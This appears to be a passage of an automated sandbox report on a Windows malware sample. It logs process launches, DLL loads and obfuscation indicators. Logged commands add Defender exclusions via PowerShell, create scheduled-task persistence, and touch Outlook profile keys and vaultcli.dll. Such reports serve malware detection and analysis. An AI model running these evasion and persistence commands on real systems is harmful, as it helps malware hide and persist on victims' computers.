                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp"
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp"
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeProcess created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: version.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: profapi.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: dwrite.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: amsi.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: userenv.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: windowscodecs.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: propsys.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: edputil.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: netutils.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: slc.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: sppc.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: version.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: wldp.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: profapi.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: amsi.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: userenv.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: vaultcli.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: dwrite.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: windowscodecs.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: vaultcli.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: LisectAVT_2403002A_16.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: LisectAVT_2403002A_16.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: LisectAVT_2403002A_16.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: FPzK.pdb source: LisectAVT_2403002A_16.exe, NxmtwwVGOtEdjd.exe.0.dr
                        Source: Binary string: FPzK.pdbSHA256 source: LisectAVT_2403002A_16.exe, NxmtwwVGOtEdjd.exe.0.dr

                        Data Obfuscation

                        barindex
                        Source: 0.2.LisectAVT_2403002A_16.exe.7b90000.8.raw.unpack, ioHoB3xyTTvGj5kpgh.cs.Net Code: MWmr0l58sc System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.LisectAVT_2403002A_16.exe.56e0000.6.raw.unpack, wehuuoKhMKMbnQu72K.cs.Net Code: LOPk5OGwQvvejRfJl7n System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.LisectAVT_2403002A_16.exe.2eb44ec.2.raw.unpack, wehuuoKhMKMbnQu72K.cs.Net Code: LOPk5OGwQvvejRfJl7n System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.LisectAVT_2403002A_16.exe.422d070.3.raw.unpack, ioHoB3xyTTvGj5kpgh.cs.Net Code: MWmr0l58sc System.Reflection.Assembly.Load(byte[])
                        Source: LisectAVT_2403002A_16.exeStatic PE information: 0xFEADA566 [Tue May 26 14:55:34 2105 UTC]
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_01304779 push esi; iretd
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_0130477B push ebp; iretd
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_013047B1 push esi; iretd
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_013046B8 push edx; iretd
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_013046BB push edx; iretd
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_0130AD27 pushfd ; iretd
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_0130AD2B pushfd ; iretd
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 0_2_05A88248 pushad ; iretd
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_0668FCEF push ss; iretd
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeCode function: 9_2_0668FCAF push ss; iretd
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07952520 push dword ptr [esi+5D906B4Fh]; ret
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 10_2_07958248 pushad ; iretd
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_06308627 pushad ; iretd
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_06305CA0 pushfd ; iretd
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeCode function: 15_2_06303D5F push es; ret
